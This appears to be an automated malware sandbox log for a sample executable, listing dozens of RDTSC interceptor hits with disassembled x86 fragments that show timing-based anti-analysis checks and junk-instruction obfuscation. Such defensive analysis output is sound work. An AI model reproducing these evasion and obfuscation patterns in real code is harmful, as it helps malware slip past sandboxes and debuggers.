Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703018D second address: 7030206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3E51171E77h 0x0000000a sub esi, 5352029Eh 0x00000010 jmp 00007F3E51171E79h 0x00000015 popfd 0x00000016 popad 0x00000017 mov dword ptr [esp], esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F3E51171E73h 0x00000023 sub cx, 8CAEh 0x00000028 jmp 00007F3E51171E79h 0x0000002d popfd 0x0000002e mov ch, 8Dh 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030206 second address: 7030233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [762C06ECh] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3E511046B7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030233 second address: 7030239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030239 second address: 703023D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703023D second address: 703024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703024D second address: 7030251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030251 second address: 7030257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030257 second address: 7030292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 call 00007F3E511046AAh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F3E51105723h 0x00000015 jmp 00007F3E511046B1h 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3E511046ADh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70315AF second address: 7031605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+24h], eax 0x0000000e jmp 00007F3E51171E76h 0x00000013 mov eax, dword ptr [esi+28h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F3E51171E6Dh 0x0000001f add ax, B266h 0x00000024 jmp 00007F3E51171E71h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031605 second address: 703160B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703160B second address: 703162F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+28h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ebx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703162F second address: 70316C3 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F3E511046B5h 0x0000000d add eax, 62B533D6h 0x00000013 jmp 00007F3E511046B1h 0x00000018 popfd 0x00000019 popad 0x0000001a mov ecx, dword ptr [esi+2Ch] 0x0000001d pushad 0x0000001e mov di, si 0x00000021 movzx eax, di 0x00000024 popad 0x00000025 mov dword ptr [edx+2Ch], ecx 0x00000028 pushad 0x00000029 jmp 00007F3E511046B1h 0x0000002e pushfd 0x0000002f jmp 00007F3E511046B0h 0x00000034 xor si, 1C58h 0x00000039 jmp 00007F3E511046ABh 0x0000003e popfd 0x0000003f popad 0x00000040 mov ax, word ptr [esi+30h] 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F3E511046B5h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316C3 second address: 70316C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316C9 second address: 70316CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316CD second address: 70316D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316D1 second address: 70316E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dl, cl 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316E5 second address: 70316EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70316EA second address: 70317E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ax, word ptr [esi+32h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3E511046B7h 0x00000012 or si, CDDEh 0x00000017 jmp 00007F3E511046B9h 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F3E511046B0h 0x00000023 sub cx, 65D8h 0x00000028 jmp 00007F3E511046ABh 0x0000002d popfd 0x0000002e popad 0x0000002f mov word ptr [edx+32h], ax 0x00000033 jmp 00007F3E511046B6h 0x00000038 mov eax, dword ptr [esi+34h] 0x0000003b jmp 00007F3E511046B0h 0x00000040 mov dword ptr [edx+34h], eax 0x00000043 jmp 00007F3E511046B0h 0x00000048 test ecx, 00000700h 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F3E511046AEh 0x00000055 sbb esi, 6CB9E9C8h 0x0000005b jmp 00007F3E511046ABh 0x00000060 popfd 0x00000061 mov dx, ax 0x00000064 popad 0x00000065 jne 00007F3EC0312601h 0x0000006b pushad 0x0000006c mov dx, cx 0x0000006f mov ebx, esi 0x00000071 popad 0x00000072 or dword ptr [edx+38h], FFFFFFFFh 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F3E511046B5h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70317E4 second address: 703180E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 mov dh, 9Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000e jmp 00007F3E51171E72h 0x00000013 or dword ptr [edx+40h], FFFFFFFFh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703180E second address: 7031812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7031812 second address: 7031818 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70206F2 second address: 70206F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70206F7 second address: 702071C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F3E51171E6Fh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov di, 4186h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 702071C second address: 7020739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E511046B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7020739 second address: 702076A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov esi, 13D56FB3h 0x00000013 mov edx, esi 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F3E51171E6Ah 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FC06CC second address: 6FC06D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FC0AC2 second address: 6FC0AC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010AFA second address: 7010AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010AFE second address: 7010B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B02 second address: 7010B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B08 second address: 7010B2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3E51171E6Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B2D second address: 7010B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B3C second address: 7010B6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3E51171E6Fh 0x00000009 adc cl, 0000001Eh 0x0000000c jmp 00007F3E51171E79h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010B6E second address: 7010BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F3E511046B7h 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F3E511046B6h 0x00000013 mov ebp, esp 0x00000015 jmp 00007F3E511046B0h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3E511046B7h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010BD0 second address: 7010BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0029 second address: 6FF00A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 pushfd 0x00000007 jmp 00007F3E511046AFh 0x0000000c adc esi, 2E832B8Eh 0x00000012 jmp 00007F3E511046B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d jmp 00007F3E511046B7h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F3E511046B6h 0x00000029 sbb esi, 12B75068h 0x0000002f jmp 00007F3E511046ABh 0x00000034 popfd 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF00A7 second address: 6FF013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov bx, 6144h 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f jmp 00007F3E51171E73h 0x00000014 and esp, FFFFFFF0h 0x00000017 jmp 00007F3E51171E76h 0x0000001c sub esp, 44h 0x0000001f pushad 0x00000020 mov dx, ax 0x00000023 mov bx, ax 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 pushad 0x00000029 call 00007F3E51171E72h 0x0000002e pushad 0x0000002f popad 0x00000030 pop eax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F3E51171E77h 0x00000038 jmp 00007F3E51171E73h 0x0000003d popfd 0x0000003e mov ax, 1DDFh 0x00000042 popad 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF013E second address: 6FF0142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0142 second address: 6FF0148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0148 second address: 6FF01BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3E511046AFh 0x00000009 sbb cx, B9DEh 0x0000000e jmp 00007F3E511046B9h 0x00000013 popfd 0x00000014 call 00007F3E511046B0h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f push edx 0x00000020 mov dh, al 0x00000022 pop ebx 0x00000023 push ecx 0x00000024 push edi 0x00000025 pop ecx 0x00000026 pop edi 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 jmp 00007F3E511046AAh 0x0000002e push eax 0x0000002f jmp 00007F3E511046ABh 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 movsx edx, ax 0x0000003b movzx ecx, dx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF01BB second address: 6FF0284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov esi, 7EFA6157h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, edi 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F3E51171E78h 0x00000015 sub cl, FFFFFFF8h 0x00000018 jmp 00007F3E51171E6Bh 0x0000001d popfd 0x0000001e mov bl, ah 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 jmp 00007F3E51171E70h 0x00000028 mov dx, si 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d jmp 00007F3E51171E6Ch 0x00000032 mov edi, dword ptr [ebp+08h] 0x00000035 jmp 00007F3E51171E70h 0x0000003a mov dword ptr [esp+24h], 00000000h 0x00000042 pushad 0x00000043 mov di, ax 0x00000046 mov ch, FFh 0x00000048 popad 0x00000049 lock bts dword ptr [edi], 00000000h 0x0000004e jmp 00007F3E51171E75h 0x00000053 jc 00007F3EC14D4045h 0x00000059 pushad 0x0000005a jmp 00007F3E51171E73h 0x0000005f popad 0x00000060 pop edi 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F3E51171E70h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0284 second address: 6FF0293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0293 second address: 6FF0299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0299 second address: 6FF029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF029D second address: 6FF02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF02A1 second address: 6FF02CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a call 00007F3E511046ADh 0x0000000f jmp 00007F3E511046B0h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 mov di, 26E4h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF02CF second address: 6FF02D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF02D3 second address: 6FF0313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 jmp 00007F3E511046B9h 0x0000000d mov esp, ebp 0x0000000f jmp 00007F3E511046AEh 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3E511046AAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0313 second address: 6FF0317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0317 second address: 6FF031D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF031D second address: 6FF0323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 6FF0323 second address: 6FF0327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7010ABB second address: 7010AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, E7h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7020A28 second address: 7020A44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7020B88 second address: 7020B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7020B9E second address: 7020BA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 709094E second address: 70909A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F3E51171E72h 0x00000012 pushfd 0x00000013 jmp 00007F3E51171E72h 0x00000018 jmp 00007F3E51171E75h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70909A5 second address: 7090A13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 push ebx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3E511046ABh 0x00000013 sbb esi, 285D292Eh 0x00000019 jmp 00007F3E511046B9h 0x0000001e popfd 0x0000001f mov ch, 9Fh 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movzx esi, bx 0x0000002a pushfd 0x0000002b jmp 00007F3E511046B1h 0x00000030 add cx, B816h 0x00000035 jmp 00007F3E511046B1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7070D8B second address: 7070D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7070D90 second address: 7070E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 pushfd 0x00000006 jmp 00007F3E511046AEh 0x0000000b or ax, 26C8h 0x00000010 jmp 00007F3E511046ABh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b push ebx 0x0000001c push esi 0x0000001d pop edx 0x0000001e pop esi 0x0000001f push ebx 0x00000020 push esi 0x00000021 pop edx 0x00000022 pop esi 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F3E511046B5h 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F3E511046ACh 0x00000033 xor cx, DB88h 0x00000038 jmp 00007F3E511046ABh 0x0000003d popfd 0x0000003e push eax 0x0000003f push edi 0x00000040 pop esi 0x00000041 pop edx 0x00000042 popad 0x00000043 pop ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 mov bx, 4FCEh 0x0000004b mov bl, 9Ah 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080537 second address: 708055C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F3E51171E6Eh 0x0000000a or si, 41D8h 0x0000000f jmp 00007F3E51171E6Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708055C second address: 7080599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3E511046AEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3E511046AEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7080599 second address: 708059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 708059F second address: 70805A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805A3 second address: 70805C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3E51171E74h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805C2 second address: 70805D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805D9 second address: 70805DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805DD second address: 70805E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70805E3 second address: 7080629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 pushfd 0x00000007 jmp 00007F3E51171E75h 0x0000000c sub si, 2846h 0x00000011 jmp 00007F3E51171E71h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3E51171E6Dh 0x00000022 rdtsc
